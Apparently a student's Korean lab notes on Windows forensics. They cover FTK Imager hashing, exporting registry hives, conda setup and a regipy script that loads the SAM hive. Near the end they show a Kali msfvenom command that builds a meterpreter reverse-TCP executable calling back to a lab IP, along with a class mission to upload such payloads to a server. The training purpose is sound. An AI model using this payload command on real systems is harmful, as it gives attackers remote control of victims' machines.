osforensics은 3개까지 생성가능
기존 > 삭제 반복하면서 숙달 예정
무료 사용을 원할 경우 Autopsy 사용하기
시나리오
관리자 실수로 악성코드가 침투된 경우는?
0) Manager의 해시값은 무엇인가? > ftk imger로 구할 수 있음
2 e
5 0 O
ftk imger에서 침투 전 윈도우 manager 해시값 구하기
MD5 : e7bff855db7ceb2433d13f0887f1f7e3
SHA1 : 82d6cfa13f34d1128a76ccaf6239a29dac4fdfb9
1) 컴퓨터 부팅 시간이 언제 인가?
5개의 레지스트리 파일 위치 : Windows > system32 > config
SAM
SECURITY
SOFTWARE
SYSTEM
DEFAULT
export files로 빼내오기
아나콘다 파이썬 가상환경 프로그램
다양한 파이선 버전을 가상환경에 만들어서 확인 가능
1. 가상환경 만들기
conda create -n py27 python=2.7
conda create -n py38 python=3.8
> 파이썬 구버전 설치
conda env list < 파이썬 설치 내용 확인
conda activate py27
conda activate py38
conda env remove -n py27
conda activate py38 > 3.8버전으로 전환
악성코드도 빼내보기 (저장된 경로로 이동)
USERS > Manager > download
이처럼 윈도우에서 분석하고 싶은 파일들은
컴퓨터로 가져와서 분석을 진행하면 된다.
빼내온 파일은 육안으로 확인하기 어려워 .py 파일을 이용하여 확인
파이썬으로 forensic.py 생성
cmd 에서 C:\Users\PC8>pip install regipy 설치
[forensic.py]
import regipy
class Forensic:
pass
def main():
sam_path = r'C:\Users\PC8\Desktop\export\SAM'
print("start program")
# SAM 파일을 Hive 객체로 로드
hive = regipy.RegistryHive(sam_path)
#hive = regipy.Hive(sam_path)
print(hive,dir(hive))
if __name__=="__main__":
main()
2) 진짜 사용자는 누구인가?
3) 무슨 사이트에 접속하였는가?
4) 무슨 파일을 받았는가?
5) 파일을 실행했는가?
리눅스 > 로그분석
윈도우 > 이벤트, 레지스트리, 약간의로그
칼리에서 악성코드 만들기
┌──(kali㉿kali)-[~/public_html]
└─$ /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.208 -f exe -o yys.exe
미션2 : 스위치 버튼2으로 변경 후
http://125.246.95.253으로 접속
칼리 활성화 후 서버에 각 조별로 악성코드 만들어서 올리기